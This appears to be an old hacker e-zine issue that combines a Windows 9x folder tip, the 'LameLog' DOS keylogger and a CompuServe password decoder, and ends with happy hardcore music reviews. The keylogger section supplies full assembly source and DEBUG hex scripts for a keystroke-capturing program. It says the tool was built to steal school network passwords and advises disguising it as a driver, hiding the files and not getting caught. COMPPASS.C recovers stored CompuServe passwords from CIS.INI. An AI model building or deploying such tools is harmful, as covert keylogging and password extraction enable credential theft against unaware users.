Please send your comments on this article to:
crossfire@hackers-uk.freeserve.co.uk , If this article has good feedback, i may write a series of demoscene related articles.
|  _> _ _  ___  ___ ___| __><_> _ _  ___ 
| <__| '_>/ . \<_-<<_-<| _> | || '_>/ ._>
`___/|_|  \___//__//__/|_|  |_||_|  \___.   _____  _____   ___  ___ __ 
  /  |  \|  _  \  \  \/  /|  |
 /       \   __/   \    / |  |
 \       /  |       \  /  |  |
  \_____/|__|        \/   |__|

PRESENTS:

More 'features' in Win 9x.
~~~~~~~~~~~~~~~~~~~~~~~~~~
	Anybody running a Win 9x box particularly one with IE4 or IE5 installed will have noticed that some folders such as your fonts folder, 'My Briefcase' and the 'Recycle Bin' behave differently to normal folders. Perhaps you want them to behave like normal folders, or create them in other places, or just bugger about with them a bit. Here's how it works. In any folder such as this, there will be a hidden file called 'desktop.ini'. Editing it will produce something along the lines of:

[.ShellClassInfo]
UICLSID={BD84B380-8CA2-1069-AB1D-08000948F534}

	This one is taken from my fonts folder. The '[.ShellClassInfo]' bit is found in all of these files, and means nothing. Its basically a comment. The next line may vary from folder to folder. A Common variation is to have CLSID instead of UICLSID. The value after the = sign is the important one, and will be different for every desktop.ini file. Creating a folder anywhere named xxx.{BD84B380-8CA2-1069-AB1D-08000948F534} (the xxx can be anything and can be any number of characters) will create a folder with the same properties as the fonts folder. The same applies for whatever else is after the '(UI)CLSID=' bit. When you've made yourself a few Recycle Bins and stuff, you will probably ask what exactly the point of this is. For a start you can delete desktop.ini, and make it behave like a normal folder. If your 'History' folder is pissing you off or something. But more importantly,  most of you will probably have seen a list looking something like this:

Network Neighborhood.{208D2C60-3AEA-1069-A2D7-08002B30309D}
Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}
My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
InterNet.{3DC7A020-0ACD-11CF-A9BB-00AA004AE837}
Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}
Brief Case.{85BBD920-42A0-1069-A2E4-08002B30309D}
Internet Explorer.{871C5380-42A0-1069-A2EA-08002B30309D}
DUN.{a4d92740-67cd-11cf-96f2-00aa00a11dd9}
Task Scheduler.{D6277990-4C6A-11CF-8D87-00AA0060F5BF}

	Recognise the layout? None of these are actually folders, and therefore do not have a desktop.ini file associated with them. For example, Control Pannel is stored as a series of files named .cpl in your \windows\system folder which can all be accessed individually. The program which puts each of these components into their 'folder' is called control.exe and is located in the root of your windows folder. But searching for the string 'clsid' in your registry will spew out a lot of interesting material. Obviously you'll have to wade through all the crap to get to it, as a lot of information about the way that Windows operates is stored in this way. The uses for these are practically limitless. Your sysadmin has probably limited access to most of this stuff, so you can just make yer own copies of the stuff.

	Having tried many ways of getting a difinitive list of these files, its actually made pretty damn difficult for you. 'dir /s /ah desktop.ini' returns 2 files, and needless to say Windoes Find is worse than useless, 'attrib /s > file.txt' and searching the file for the string desktop.ini gets most of them, but for some reason fails to locate some. Try them both to see what I mean. If anybody can get any better results than this, please contact me (ergophobe@dial.pipex.com).

	And the moral, the registry holds the key (sorry bad pun) to just about everything in Windows. Leave no stone unturned.

ergophobe
                  ���������������������������������������ͻ
                  � � � � � � � � � � � � � � � � � � � � �
                  � �     L   A   M   E   L   O   G     � �
                  � �      b y   E X E - G e n c y      � �
                  � � � � � � � � � � � � � � � � � � � � �
                  ���������������������������������������ͼ

        The two LameLog programs are key trapping programs. Key trapping is
the process of hooking a keyboard interrupt, intercepting all the buttons
pressed by the user and writing them to a file. Programs such as these are
extremely useful for finding user names and passwords. I only wrote this
lame program to get some passwords on my school network because I didn't have
access to the internet at the time and therefore couldn't get hold of a
decent key trapping program.
       The first program (LAMELOG1) must be run before the login screen
program and will keep a buffer of the key pressed. The second program must be
run after hte security program and will write all of the keys to a file
(test.log).

�������������������Ŀ
� Interrupt hooking �
����������������������

        As every assembly programmer should know, there are two different
interrupts used to service the keyboard: INT 09h and INT 16h. INT 09h
provides low level access and lets us detect 'special keys' like CTRL, ALT,
SHIFT, CAPS LOCK etc. INT 16h provided a wide range of easy-to-use functions
that allows high-level access to the keyboard. We will be installing own
INT 09h handler that will collect all key presses and dump them to a file.
        We will also be installing our own INT 21h handler, that lets us
check memory residency and the position of the buffer in memory. Below is
a list of the functions and return values for the two new interrupt
handlers.

INT 21h

AX = F0001h
returns
AX = 1234h
if LAMELOG1 is resident in memory.

INT 21h

AX = F0001h
returns
BX = Length of buffer
DX = Offset of buffer
ES = Segment of buffer

������������������������Ŀ
� Using the two programs �
��������������������������

        Simply call LAMELOG1 before the security program, and LAMELOG2 after
it. For example, the AUTOEXEC.BAT file would be:

@echo off
keyb
mouse
(etc)
cd\
lamelog1
security software
lamelog2

        Make sure that the two files are either in the root directory or in
one that is included in the system PATH or there will be a few 'bad command
or filename' messages on boot-up. It would also be a good idea to rename the
two files to something less suspicious such as keyboard drivers etc. as well
as giving them the ATTRIB +H treatment.
        Before the program can work successfully, there must be a file
called TEST.LOG in the root directory. After a few boot ups, open the file
using a hex-editor, and you will be able to see all scan codes for key
presses.
        If you've got access to the system files then the security must be
pretty shite and you have nothing to gain by using other peoples passwords.
You should, however, remember that a user may be using the same logon
password as that for a unix account, ISP account etc.
        The only knowledge I have of assembly language, has been gathered by
reading virus programming tutorials and source codes. It is for this reason
that many of the techniques used (especially the interrupt hooking,
interrupt handling and residency calls) resemble viral code and will
trigger heuristic AV programs.
        Have fun and don't get caught.

        Um! When reading keys from the keyboard port, you don't get nice
ascii numbers (like 65 for A etc.) but complex scan codes, instead. It is
not immediately obvious what these codes represent, so I've included a table
of the most common key presses. The first hex byte is the code generated
when the key is pressed while the second byte corresponds to the code
generated when the key is released.

a 1Eh 9Eh | n 31h B1h | 1 02h 82h
b 30h B0h | o 18h 98h | 2 03h 83h
c 2Eh AEh | p 19h 99h | 3 04h 84h
d 20h A0h | q 10h 90h | 4 05h 85h
e 12h 92h | r 13h 93h | 5 06h 86h
f 21h A1h | s 1Fh 9Fh | 6 07h 87h
g 22h A2h | t 14h 94h | 7 08h 88h
h 23h A3h | u 16h 96h | 8 09h 89h
i 17h 97h | v 2Fh AFh | 9 0Ah 8Ah
j 24h A4h | w 11h 91h | 0 0Bh 8Bh
k 25h A5h | x 2Dh ADh |
l 26h A6h | y 15h 95h |
m 32h B2h | z 2Ah ACh |
space 39h B9h
enter 1Ch 9Ch
shift 2Ah AAh
backspace 0Eh 8Eh

        For example, should someone press 'S' three times, then hold down
'T' then press enter, you would get:

1F 9F 1F 9F 1F 9F 14 14 14 14 14 94 1C 9C
� S � � S � � S � ������� T ������� �ENT�

        If you want to know the scan codes for keys other than those listed
above (such as F1-F12, cursor keys) you'll have to experiment by yourself.

Warrantly notice: I cannot stress how buggy and lame theses two programs are.
If you want a decent key trapping program, for gods sake, go and find one on
the internet. All of the ones I've seen on the internet since writing this
program were much better.

���������������������������������������������������������������������������Ŀ
�              L A M E L O G 1 . A S M   s o u r c e   c o d e              �
�����������������������������������������������������������������������������
; To compile:
; TASM LAMELOG1
; TLINK /T LAMELOG1
prog            segment
assume          cs:prog, ds:prog
org             0100h

ProgStart:      jmp     GoResident ; Jump past INT 09h handler

NewInt09hHand:  pushf       ; Save flags register
                push    bp  ; Save BP
                push    ax  ; Save AX
                push    bx  ; Save BX
                push    cx  ; Save CX
                push    dx  ; Save DX
                push    ds  ; Save DS
                push    es  ; Save ES
                
                push    cs  ; Save CS
                push    cs  ; Save CS
                pop     ds  ; Pop CS to DS
                pop     es  ; Pop CS to ES

                in      al, 60h ; Read character from keyboard port
                mov     bp, BufferLength ; Put bufferlength into BP
                mov     byte ptr Buffer[bp], al ; Put AL (char) into array
                inc     bp   ; BP++
                cmp     bp, 1001 ; If BP=1001
                jne     UpdateBufferLen
                mov     bp, 00h  ; Set BP to zero

UpdateBufferLen:mov     BufferLength, bp ; Move BP to Bufferlength

                pop     es ; Restore ES
                pop     ds ; Restore DS
                pop     dx ; Restore DX
                pop     cx ; Restore CX
                pop     bx ; Restore BX
                pop     ax ; Restore AX
                pop     bp ; Restore BP
                popf       ; Restore flags

OldInt09hHand:  db      0EAh  ; Code for jmp far
OldInt09hOff    dw      0000h ; Offset of old INT 09h handler
OldInt09hSeg    dw      0000h ; Segment of old INT 09h handler

NewInt21hHand:  pushf ; Push flags
                cmp     ax, 0F001h ; If AX=F001h (Residency check)
                jne     NextFunction ; Check for next function
                mov     ax, 1234h ; Return 1234h to calling program
                popf    ; Restore flags
                iret    ; Return to calling program
                
NextFunction:   cmp     ax, 0F002h ; If AX=F002h (Get segment/offset etc.)
                jne     OldInt21hHand ; Jump to old handler
                ; Return Seg and Offset of buffer data
                push    ds ; Save DS
                push    cs ; Save CS
                pop     ds ; Restore CS in DS

                mov     bx, word ptr BufferLength ; Move buffer length to BX
                mov     dx, word ptr BufferOffset ; Move buffer offset to DX
                mov     es, word ptr BufferSegment; Move Buffer segment to ES
                
                pop     ds ; Restore DS
                popf    ; Restore flags
                iret    ; Return to calling program
OldInt21hHand:  popf    ; Restore flags
                db      0EAh ; Code for JMP FAR
OldInt21hOff    dw      0000h ; Offset of old int 21h handler
OldInt21hSeg    dw      0000h ; Segment of old int 21h handler

BufferSegment   dw      0000h ; Segment of key buffer
BufferOffset    dw      0000h ; Offset of key buffer
BufferLength    dw      0000h ; Length of key buffer
Buffer          db      1000 dup(0) ; Buffer (maximum of 1000 characters)

GoResident:     mov     ax, 0F001h ; Check if LAMELOG1 is already resident
                int     21h        ; Call DOS interrupt
                cmp     ax, 1234h  ; If AX==1234h then LAMELOG1 is already TSR
                je      Exit       ; ...and therefore end program

                push    cs  ; Save CS register
                pop     ds  ; Restore CS register into DS

                mov     BufferSegment, ds ; Move DS to BufferSegment
                lea     ax, Buffer ; Load address of Buffer to AX
                mov     BufferOffset, ax ; Store AX in BufferOffset

                mov     ax, 3509h ; Get current Seg/Off of current 09h handler
                int     21h       ; Call DOS interrupt
                mov     OldInt09hOff, bx ; Move old Int09h Off to OldInt09hOff
                mov     OldInt09hSeg, es ; Move old Int09h Seg to OldInt09hSeg
                
                mov     ax, 3521h ; Get current Seg/Off of current 21h handler
                int     21h       ; Call DOS interrupt
                mov     OldInt21hOff, bx ; Move old Int21h Off to OldInt21hOff
                mov     OldInt21hSeg, es ; Move old Int21h Off to OldInt21hOff
                
                mov     ax, 2509h ; Set new Int 09h
                lea     dx, NewInt09hHand ; DX=Offset of NewInt09hHandler
                int     21h ; Cass DOS interrupt
                
                mov     ax, 2521h ; Set new Int 21h
                lea     dx, NewInt21hHand ; DX=Offset of NewInt21hHandler
                int     21h ; Cass DOS interrupt

                lea     dx, ProgramEnd ; Set DX to end of program
                int     27h ; Go TSR

Exit:           int     20h ; Return to operating system
ProgramInfo     db      'LameLog1 written by EXE-Gency'
ProgramEnd:
prog            ends
end             ProgStart

���������������������������������������������������������������������������Ŀ
�              L A M E L O G 1         d e b u g   s c r i p t              �
�����������������������������������������������������������������������������

If you don't have TASM and TLINK, just copy the following to a text file and
type:
debug < filename
and a file called 'lamelog1.com' will appear

N LAMELOG1.COM
E 0100 E9 48 04 9C 55 50 53 51 52 1E 06 0E 0E 1F 07 E4 
E 0110 60 8B 2E 61 01 3E 88 86 63 01 45 81 FD E9 03 75 
E 0120 03 BD 00 00 89 2E 61 01 07 1F 5A 59 5B 58 5D 9D 
E 0130 EA 00 00 00 00 9C 3D 01 F0 75 05 B8 34 12 9D CF 
E 0140 3D 02 F0 75 12 1E 0E 1F 8B 1E 61 01 8B 16 5F 01 
E 0150 8E 06 5D 01 1F 9D CF 9D EA 00 00 00 00 00 00 00 
E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0540 00 00 00 00 00 00 00 00 00 00 00 B8 01 F0 CD 21 
E 0550 3D 34 12 74 3B 0E 1F 8C 1E 5D 01 B8 63 01 A3 5F 
E 0560 01 B8 09 35 CD 21 89 1E 31 01 8C 06 33 01 B8 21 
E 0570 35 CD 21 89 1E 59 01 8C 06 5B 01 B8 09 25 BA 03 
E 0580 01 CD 21 B8 21 25 BA 35 01 CD 21 BA AF 05 CD 27 
E 0590 CD 20 4C 61 6D 65 4C 6F 67 31 20 77 72 69 74 74 
E 05A0 65 6E 20 62 79 20 45 58 45 2D 47 65 6E 63 79 
RCX
04AF
W
Q
���������������������������������������������������������������������������Ŀ
�              L A M E L O G 2 . A S M   s o u r c e   c o d e              �
�����������������������������������������������������������������������������
; To compile:
; TASM LAMELOG2
; TLINK /T LAMELOG2
prog            segment
assume          cs:prog, ds:prog
org             0100h

ProgStart:      mov     ax, 0F001h ; Is LAMELOG1 resident?
                int     21h        ; DOS interrupt

                cmp     ax, 1234h  ; If AX==1234h then LAMELOG is resident
                je      OpenFile   ; then jump to 'OpenFile' label

                mov     ah, 09h    ; 09h==DOS function to write to screen
                lea     dx, NotResident ; DX==Offset of 'No TSR!' message
                int     21h        ; Call DOS interrupt
                jmp     Exit       ; Jump to end of program

OpenFile:       mov     ah, 3Dh    ; 3Dh==DOS function to open file
                mov     al, 02h    ; Open file for writing
                lea     dx, LogFilename ; DX==Offset of filename 'TEST.LOG'
                int     21h        ; Call DOS interrupt
                jnc     SeekEOF    ; If no error then jump to label 'SeekEOF'

                mov     ah, 09h    ; DOS Function to write to screen
                lea     dx, BadFile; DX==Offset of 'Bad file!' text string
                int     21h        ; Call DOS interrupt
                jmp     Exit       ; Jump to end of program

SeekEOF:        xchg    bx, ax     ; Move file handle from AX to BX

                mov     ah, 42h    ; 42h==DOS function to seek position in file
                mov     al, 02h    ; 02h==EOF
                mov     cx, 0000h  ; Most significant part of offset
                mov     dx, 0000h  ; Least significant part of offset
                int     21h        ; Call DOS interrupt

WriteStart:     mov     ah, 40h    ; 40h==DOS function to write to file
                mov     cx, 09h    ; CX==Number of bytes to write
                lea     dx, StartString ; DX==Offset of 'START' string
                int     21h        ; Call DOS interrupt

                push    bx         ; Vale file handle for a moment

                mov     ax, 0F002h ; Get Seg/Offset/Length of buffer from
                                   ; LameLog1 program resident in memory
                int     21h        ; Call DOS interrupt

;               bx=BufferLength
;               es=BufferSegment
;               dx=BufferOffset

                mov     cx, bx     ; Move length of buffer into CX

                pop     bx         ; Restore file handle from stack

                push    ds         ; Save DS register

                push    es         ; Push ES register to stack
                pop     ds         ; Restore ES into DS (mov ds, es)

                mov     ah, 40h    ; Write to file
                int     21h        ; DOS interrupt

                pop     ds         ; Restore DS register

                mov     ah, 3Eh    ; 3Eh==Close File
                int     21h        ; Do it.

Exit:           int     20h        ; Call int 20h (return to OS)
NotResident     db      'No TSR!



BadFile         db      'Bad file!



StartString     db      0Dh, 0Ah, 'START', 0Dh, 0Ah
LogFilename     db      'test.log', 00h
ProgramInfo     db      'LameLog2 written by EXE-Gency'
prog            ends
end             ProgStart

���������������������������������������������������������������������������Ŀ
�              L A M E L O G 2         d e b u g   s c r i p t              �
�����������������������������������������������������������������������������

If you don't have TASM and TLINK, just copy the following to a text file and
type:
debug < filename
and a file called 'lamelog2.com' will appear

N LAMELOG2.COM
E 0100 B8 01 F0 CD 21 3D 34 12 74 0A B4 09 BA 57 01 CD 
E 0110 21 EB 42 90 B4 3D B0 02 BA 72 01 CD 21 73 0A B4 
E 0120 09 BA 5F 01 CD 21 EB 2D 90 93 B4 42 B0 02 B9 00 
E 0130 00 BA 00 00 CD 21 B4 40 B9 09 00 BA 69 01 CD 21 
E 0140 53 B8 02 F0 CD 21 8B CB 5B 1E 06 1F B4 40 CD 21 
E 0150 1F B4 3E CD 21 CD 20 4E 6F 20 54 53 52 21 24 42 
E 0160 61 64 20 66 69 6C 65 21 24 0D 0A 53 54 41 52 54 
E 0170 0D 0A 74 65 73 74 2E 6C 6F 67 00 4C 61 6D 65 4C 
E 0180 6F 67 32 20 77 72 69 74 74 65 6E 20 62 79 20 45 
E 0190 58 45 2D 47 65 6E 63 79 
RCX
0098
W
/*********************************************************************
 *                                                                   *
 * COMPPASS.C by EXE-Gency                                           *
 * A program to find the compuserve password on a windows machine by *
 * searching the C:\WINDOWS directory for the CIS.INI file that      *
 * contains the encrypted password. The encryption routine was taken *
 * from an old file by Gnasher from the Electronic Terrorism Group.  *
 *                                                                   *
 * If you want to compile the source code yourself you'll need a     *
 * copy of DJGPP:                                                    *
 *                                                                   *
 * GCC -O COMPPASS.EXE COMPPASS.C                                    *
 *                                                                   *
 *********************************************************************/

#include "stdio.h"
#include "process.h"
#include "string.h"
#include "ctype.h"

unsigned int GetDec(char C[2]); // Function that returns the integer value
                                // of a two character hex digit

int main() {
    FILE          *File;
    char          String[200], *Ptr1, *Ptr2;
    unsigned int  Counter1, Decimal;
    char          TwoChar[2];
    unsigned char Key[24]={198,253,199,161,237,251,  // Keys for each char
                           182,254,227,219,245,190,
                           186,239,221,247,171,198,
                           253,199,161,237,251,182};

    printf("COMPPASS v1.0 EXE-Gency. Program to get compuserve password.\n");
    if((File=fopen("CIS.INI", "r"))==NULL) {
    // Carnt open file CIS.INI in current directory for reading
        printf("Cannot find file CIS.INI in current directory!\n");
        printf("Aborted");
        exit(1); // Quit to OS
    }

    while(!feof(File)) {
        fgets(String, 199, File); // Read string
        Ptr1=strstr(String, "Password"); // Is 'Password' in string?
        if(!(Ptr1-String)) { // Yep!
            printf("Encrypted %s", String);
            Ptr1=String;
            Ptr2=String;
            Ptr1+=9;
            while(*Ptr1) { // Copy string
                *Ptr2=*Ptr1;
                Ptr1++;
                Ptr2++;
            }
            *Ptr2=*Ptr1;
            printf("True Password=");
            for(Counter1=0; Counter1<strlen(String); Counter1+=2) {
               TwoChar[0]=String[Counter1];
               TwoChar[1]=String[Counter1+1]; // Get hex string
               Decimal=GetDec(TwoChar); // Convert to decimal
               if(Decimal^Key[Counter1/2]) printf("%c", Decimal^Key[Counter1/2]);
               else break;
            }
            printf("\n"); // CR/LF
        }
    }
    fclose(File);
    return 0;
}

unsigned int GetDec(char C[2]) {
    unsigned int X;
    X=0;
    if(isdigit(C[0])) X+=(C[0]-48)*16;
    else X+=(C[0]-55)*16;

    if(isdigit(C[1])) X+=(C[1]-48);
    else X+=(C[1]-55);
    return X;
}
   _____  _____   ___  ___ __ 
  /  |  \|  _  \  \  \/  /|  |
 /       \   __/   \    / |  |
 \       /  |       \  /  |  |
  \_____/|__|        \/   |__|

PRESENTS:

HAPPY HARDCORE REVIEWS
~~~~~~~~~~~~~~~~~~~~~~
By: Walrus & CrossFire

This is a new section which will be written in conjunction with http://walrus.bog.net. All of the tunes and mixes reviewed by me (Walrus) will be available for listening or downloading from my site. Tracks that CrossFire reviews may also be there, but no promises. Where possible, a URL will be supplied. Well that's the theory anyway. Whether I will have enough server space is another matter. If anybody can donate some. Please get in contact. (ergophobe@dial.pipex.com)

Not all the tracks and mixes that I review will be happy hardcore. There will probably be oldskool, techno, drum 'n' bass, trance and more, although it will be mainly hardcore. Many of the tracks and mixes we review are going to be by up and coming DJs and producers, as there are already a lot of reviews of commercial tracks scattered around the web, and in 'zines (Antisocial springs to mind). If you would like either of us to review any tracks or mixes, send mods/mp3s/vqfs/realaudios or whatever your chosen format is to me (ergophobe@dial.pipex.com) or CrossFire (crossfire@hackers-uk.freeserve.co.uk). Please don't send huge files though. For example, sending a 1 hour mix in mp3 format is not appropriate. If you want an address to send records/CDs/tapes to, just drop one of us a line.

So what exactly is happy hardcore then?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Glad you asked:
Happy hardcore (sometimes called 4beat, but mainly by Canadians) is very fast music. Usually between 160 and 180 bpm. It is characterised by a strong 4/4 kick beat, pianos and female vocals. Breakbeats are often used too. It was born in the UK, and is most popular here too, but there is also a Canadian and American scene. Based mainly in Toronto. Some say it developed around 1992, others say around 1994. Personally I say that happy hardcore became happy hardcore as we know it at the end of 1994. Music of this type produced between 1992 and 1994 is what I call oldskool. It has a different sound. More breakbeats, less vocals and it tends to have less of the distinctive 4/4 kick beat we usually associate with happy hardcore produced after 1994. Before this, the genre had already split. Music that used the breakbeats and favoured deep, wildly varying basslines over vocals and piano lines had become known as jungle, now more commonly known as drum 'n'bass. This style of music was to become more commercially viable and gain greater status and popularity.

So on with the reviews:
~~~~~~~~~~~~~~~~~~~~~~~

Title:          DJ Reflex - I don't need your love (remix)
Reviewed by:    Crossfire
Available from: http://www.eurodance.freeserve.co.uk
Style:          Happy Hardcore/Oldskool

The First tune in a while from DJ Reflex, this one tries a bit of an oldskool breakbeat approach, together with a piano and vocal over the top. Later on this combines some speaking samples and a really ameteur sounding piano. Features a few more vocals, then ends. Pretty good for radio / mix play, but frankly this is a bit too weak for me.



Title:          DJ Skywalker - Sometimes You're Thinkin'
Reviewed by:    Crossfire
Available from: http://www.davesdomain.bog.net
Style:          Happy Hardcore

Ahh, the Nu Skool Old Skool Producer is here. I must admit, Skywalker is one of my favourite producers so I am a bit biased, but what the hell. This track starts off with some breaks, and gradually, a couple of vocal samples sneak in before some pianos. It stays with the breaks for a while before some nice vocals are added in there, which Is a nice touch. Goes back to the breaks before fading out. Nice one Dave!



Title:          DJ Luna - A Different Place
Reviewed by:    Crossfire
Available from: http://freespace.virgin.net/mark.dunn
Style:          Happy Hardcore/Oldskool

Well, a common or pub garden attempt at oldskool style hardcore. Drops into the Childish "You're in a different place now motherfucker" Rap, and Is followed by more drums, and A slowed down version of said rap. Apart from the vocal - which imho shows how childish DJ Luna is (That and His other track "Kill da damn teachers, burn da fuckin skool"), this is a pretty good - if a bit boring track.



Title:          Future Raver - U Can B a star
Reviewed by:    Crossfire
Available from: http://freespace.virgin.net/mark.dunn
Style:          Happy hardcore

Another release from that esteemed group LMP. U Can B A Star is Happy Hardcore the way it should be, has some nice uplifting strings and a piano or sommat at the beginning. Drops into the Standard breaky drums, then a nice uplifting rap "Trance Baby through your mind.... You can be a star tonight and make it feel alright) Ripped from Everybody is a star by Universe - whoever they are. The Drum beats and strings at the start sound a bit out of place, but overall, a nice hardcore Tune.



Title:          Future Raver - Deep in my heart
Reviewed by:    Crossfire
Available from: http://freespace.virgin.net/mark.dunn
Style:          House

Rightie ho, the third LMP Release in this review. It seems Future Raver just can't keep away from Fast Tracker, and he proves this with this nice house choone. The Distorted 909 Kicks, the Hi Hats, the crashes, all the elements of a good house tune - all in there. This atmosphere is added to with a piano, and a nice lil keyboard creeping in there. It goes on like this for ages before an organ comes in and lifts it up a bit. This one is destined For greatness, and Future Raver seems to be a producer to watch.



Title:          DJ Sonic - Go Mental vs Brisk
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Happy Hardcore

The tracklist for this 25 minute mix looks something like this:

1) Don�t Cry - DJ Kaos - (Go Mental Gold) 
2) Set Free - Brisk - (HTSE 1) 
3) Generation Love - DJ Kaos & DJ Energy - (Fluid 'Import') 
4) Step To The Side - Brisk Remix - (United Dance Recordings) 
5) Fine - DJ Kaos & DJ Impact - (Go Mental Gold)

Before even listening to this, I thought that it was an excellent idea for a mix. Much better than a random selection of tunes. I'd like to see more of this sort of thing. The mixing is good, but nothing special. Some scratching or punches or something would have been nice. As a rule, I'm not overly keen on ripoffs, so a mix full of them wasn't something which initially appealed to me, but on listening to it, I changed my mind. The tracks are all good as ripoffs go. Better than the usual approach of sticking a kick beat under a badly timestretched vocal anyway. Overall, I was pretty impressed with the way the whole thing comes together, but I thought the mixing could have been something a bit more special.


Title:          TMC - The Love Temple
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Hardtrance

Another release from one of my favourite tracking groups, The Lost Patrol (http://come.to/lostpatrol) I like this a lot, as I do most hardhouse and hardtrance tunes. There's a nice minor key synth line all through, and the whole track has a kinda eerie sound to it. Its not too heavy, and lots of nice basslines in the middle too. I'm a big fan of fast tracks, and this track is about as fast as you'll hear hardtrance. Overall I like this track a lot. Another excellent release from The Lost Patrol.



Title:          MC Wildstyle - Hold Me Now (Oldskool remix)
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Oldskool

Oh god. Not another one I thought as I downloaded it, but on actually listening to the damn thing I was pretty impressed to start off with. It starts with a nice breakbeat, and a sample ripped from another ripoff of this tune that I've heard somewhere. Then it starts to deteriorate as it drops to the vocal and adds a different breakbeat (which is a bit basic and tacky compared to the first one). Next off we get a fairly average piano line which sounds a bit cheesy and some equally cheesy synths. At least we get the nice breakbeat from the start back again. Finally we have to suffer the piano and vocal again, before the track ends. As I've mentioned on many occasions, I don't really like ripoffs, I prefer to listen to original tracks. This tune really doesn't do anything for me at all.



Title:          Twister - Passing By(e)
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Drum 'n' Bass

This is to be Twister's last ever release for Total Eclipse, and a mighty fine one it is too. Some of the sounds near to the beginning remind me a bit of Atlantis, so a pretty mellow track there. Nice hihats in all the right places. Then, the whole thing goes a bit darker with the addition of a really deep bassline and some slightly heavier and more traditional breakbeats. One of the best tracks I've reviewed this month.



Title:          Bassmaster - Love Ride
Reviewed by:    Walrus
Available from: http://walrus.bog.net
Style:          Happy Hardcore

